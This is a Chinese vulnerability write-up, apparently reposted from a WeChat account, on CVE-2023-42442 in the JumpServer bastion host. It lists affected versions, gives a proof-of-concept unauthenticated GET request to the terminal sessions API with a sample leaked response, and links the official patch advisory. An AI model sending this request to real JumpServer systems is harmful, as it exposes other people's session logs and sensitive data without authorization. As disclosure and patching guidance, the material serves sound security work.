本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
漏洞说明
JumpServer是一款使用Python, Django开发的开源跳板机系统,为亏联网企业提供了认证,授权,审计,自动化运维等功能,基于ssh协议来管理,客户端无需安装agent。JumpServer采用分层架构,分别是负载层、接入层、核心层、数据层、存储层。
JumpServer的权限管理存在缺陷,未经授权的远程攻击者可以下载历史会话连接期间的所有操作日志,可导致敏感信息泄漏。
影响版本
3.0.0 <= version <= 3.5.4
3.6.0 <= version <= 3.6.3
漏洞复现
payload:
/api/v1/terminal/sessions/
请求包:
GET /api/v1/terminal/sessions/ HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
响应包:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 19 Sep 2023 11:08:54 GMT
Content-Type: application/json
Content-Length: 445605
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, POST, PUT, PATCH, DELETE, HEAD, OPTIONS
X-Frame-Options: DENY
Content-Language: zh-hans
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Set-Cookie: SESSION_COOKIE_NAME_PREFIX=jms_; Path=/
[{"id":"xxxx","user":"xxx",.....}]
修复建议
官方已发布修复方案,受影响的用户建议联系官方获取安全补丁。https://github.com/jumpserver/jumpserver/security/advisories/GHSA-633x-3f4f-v9rw
本文章仅用于学习交流,不得用于非法用途
原文始发于微信公众号(才疏学浅的H6):JumpServer未授权访问漏洞(CVE-2023-42442)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论